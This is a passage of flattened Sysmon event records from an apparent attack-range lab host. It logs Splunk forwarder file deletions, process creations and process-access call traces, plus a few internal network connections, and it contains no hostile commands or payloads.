Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1187FD46E99D4C3C1B58EC9FCAD36FBE,SHA256=FA38A1C7D4A24A082AEB8913845B240B062BB637C88BAAE1880C3AEED4649714,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341596Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:27.909{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06B87F52857D36FFB61DB0D2E657F39D,SHA256=F406052C39D33A4FC3BE09B2FD6B8B6819E1AC9D8C9340F442A2BF3500950E5E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341597Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:28.959{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF56A8FCE2DEA6441CAAA7C15A1E01FE,SHA256=DD7EBFBD36C59359AFFF3D8B51FE46ECC5AEFF9D861A6036908BA46AC3C71BF6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341599Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:29.973{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C58988ADB7A0F9923CB4F97358433914,SHA256=11DEEB66078D03C87F2910851BB8669E6BF84C170E6C345F6F64E9246DB4FD02,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341598Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:29.642{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9D6D2B5A6C8C43AFDD7AB1C25C943BA0,SHA256=BF8BAA6D494ACD579CF11D23375E19CCB7E58F8839CE77933407BC14809E5E87,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341602Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:30.988{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B079E46FACF19F62EAF5E63935CF1555,SHA256=8B10CC878303709E7690AEFB7EFCCD1596491047E34E54EE52DA31063E584E1A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341601Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.200{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52320-false10.0.1.12-8000- 354300x800000000000000035341600Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:55.555{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52319-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035341619Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:31.907{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-71E3-613B-14B4-03000000C801}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341618Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:31.905{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341617Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:31.904{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341616Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:31.904{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341615Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:31.904{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341614Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:31.904{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-71E3-613B-14B4-03000000C801}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035341613Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:31.904{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-71E3-613B-14B4-03000000C801}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035341612Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:31.888{B81B27B7-71E3-613B-14B4-03000000C801}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035341611Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:31.372{B81B27B7-71E3-613B-13B4-03000000C801}47564536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341610Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:31.209{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-71E3-613B-13B4-03000000C801}4756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341609Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:31.208{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341608Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:31.208{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341607Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:31.208{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341606Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:31.208{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341605Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:31.208{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-71E3-613B-13B4-03000000C801}4756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035341604Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:31.207{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-71E3-613B-13B4-03000000C801}4756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035341603Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:31.189{B81B27B7-71E3-613B-13B4-03000000C801}4756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035341631Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:32.587{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-71E4-613B-15B4-03000000C801}2120C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341630Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:32.587{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341629Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:32.587{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341628Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:32.587{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341627Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:32.587{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341626Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:32.587{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-71E4-613B-15B4-03000000C801}2120C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035341625Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:32.587{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-71E4-613B-15B4-03000000C801}2120C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035341624Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:32.572{B81B27B7-71E4-613B-15B4-03000000C801}2120C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 